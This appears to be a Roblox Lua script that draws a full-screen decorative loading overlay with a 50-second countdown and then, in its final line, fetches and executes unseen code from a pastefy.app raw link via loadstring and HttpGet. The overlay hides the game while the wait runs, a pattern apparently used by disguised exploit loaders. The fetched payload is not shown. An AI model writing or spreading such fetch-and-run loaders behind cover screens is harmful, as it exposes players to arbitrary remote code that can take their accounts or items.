local Players = game:GetService("Players")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

-- Remove existing UI if any
if playerGui:FindFirstChild("GardenLoadUI") then
	playerGui:FindFirstChild("GardenLoadUI"):Destroy()
end

local screenGui = Instance.new("ScreenGui")
screenGui.Name = "GardenLoadUI"
screenGui.ResetOnSpawn = false
screenGui.IgnoreGuiInset = true
screenGui.Parent = playerGui

-- Background
local bg = Instance.new("Frame")
bg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
bg.Size = UDim2.new(1, 0, 1, 0)
bg.Position = UDim2.new(0, 0, 0, 0)
bg.BorderSizePixel = 0
bg.ZIndex = 0
bg.Parent = screenGui

-- Decorations
local decorations = {
	{img="rbxassetid://507845210", pos=UDim2.new(0, 10, 0, 10)},
	{img="rbxassetid://507845159", pos=UDim2.new(1, -80, 0, 20)},
	{img="rbxassetid://507845297", pos=UDim2.new(0, 20, 1, -100)},
	{img="rbxassetid://507845432", pos=UDim2.new(0.5, -100, 0, 0)},
	{img="rbxassetid://507845606", pos=UDim2.new(1, -90, 1, -90)}
}

for _, item in pairs(decorations) do
	local img = Instance.new("ImageLabel")
	img.Image = item.img
	img.Size = UDim2.new(0, 64, 0, 64)
	img.Position = item.pos
	img.BackgroundTransparency = 1
	img.ZIndex = 1
	img.Parent = bg
end

-- UI Panel
local panel = Instance.new("Frame")
panel.AnchorPoint = Vector2.new(0.5, 1)
panel.Position = UDim2.new(0.5, 0, 0.95, 0)
panel.Size = UDim2.new(0, 320, 0, 160)
panel.BackgroundColor3 = Color3.fromRGB(240, 245, 255)
panel.BackgroundTransparency = 0.05
panel.BorderSizePixel = 0
panel.ZIndex = 2
panel.Parent = screenGui
panel.ClipsDescendants = true
panel:TweenPosition(panel.Position, Enum.EasingDirection.Out, Enum.EasingStyle.Back, 0.4, true)

local corner = Instance.new("UICorner")
corner.CornerRadius = UDim.new(0, 20)
corner.Parent = panel

-- Title
local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, 0, 0, 30)
title.Position = UDim2.new(0, 0, 0.1, 0)
title.BackgroundTransparency = 1
title.Text = "Waiting to Load Script Patiently"
title.TextColor3 = Color3.fromRGB(255, 160, 190)
title.Font = Enum.Font.FredokaOne
title.TextScaled = true
title.ZIndex = 3
title.Parent = panel

-- Countdown Label
local counter = Instance.new("TextLabel")
counter.Size = UDim2.new(1, 0, 0, 50)
counter.Position = UDim2.new(0, 0, 0.35, 0)
counter.BackgroundTransparency = 1
counter.Text = "50s"
counter.TextColor3 = Color3.fromRGB(100, 200, 150)
counter.Font = Enum.Font.GothamBlack
counter.TextScaled = true
counter.ZIndex = 3
counter.Parent = panel

-- Subtext
local subtext = Instance.new("TextLabel")
subtext.Size = UDim2.new(1, 0, 0, 30)
subtext.Position = UDim2.new(0, 0, 0.65, 0)
subtext.BackgroundTransparency = 1
subtext.Text = "Be patient if it's not loading or looks stuck!"
subtext.TextColor3 = Color3.fromRGB(140, 140, 140)
subtext.Font = Enum.Font.Gotham
subtext.TextScaled = true
subtext.ZIndex = 3
subtext.Parent = panel

-- Credits
local credit = Instance.new("TextLabel")
credit.Size = UDim2.new(1, 0, 0, 25)
credit.Position = UDim2.new(0, 0, 0.83, 0)
credit.BackgroundTransparency = 1
credit.Text = "Credits to Tenshi!"
credit.TextColor3 = Color3.fromRGB(100, 180, 255)
credit.Font = Enum.Font.Gotham
credit.TextScaled = true
credit.ZIndex = 3
credit.Parent = panel

-- Rain Effect
local function spawnRain()
	coroutine.wrap(function()
		while screenGui and screenGui.Parent do
			local drop = Instance.new("Frame")
			drop.Size = UDim2.new(0, 2, 0, math.random(10, 30))
			drop.Position = UDim2.new(math.random(), 0, -0.1, 0)
			drop.BackgroundColor3 = Color3.fromRGB(100, 200, 255)
			drop.BorderSizePixel = 0
			drop.ZIndex = 0
			drop.Parent = screenGui

			game:GetService("TweenService"):Create(drop, TweenInfo.new(1.5, Enum.EasingStyle.Linear), {
				Position = UDim2.new(drop.Position.X.Scale, 0, 1.2, 0)
			}):Play()

			game:GetService("Debris"):AddItem(drop, 2)
			wait(0.05)
		end
	end)()
end

spawnRain()

-- Countdown Logic
local seconds = 50
coroutine.wrap(function()
	while seconds > 0 do
		counter.Text = seconds .. "s"
		seconds -= 1
		wait(1)
	end
	counter.Text = "Loading..."
	
	-- ADD YOUR CUSTOM LOADSTRING SCRIPT HERE
	loadstring(game:HttpGet("https://pastefy.app/EEmKlIPx/raw"))()
end)()
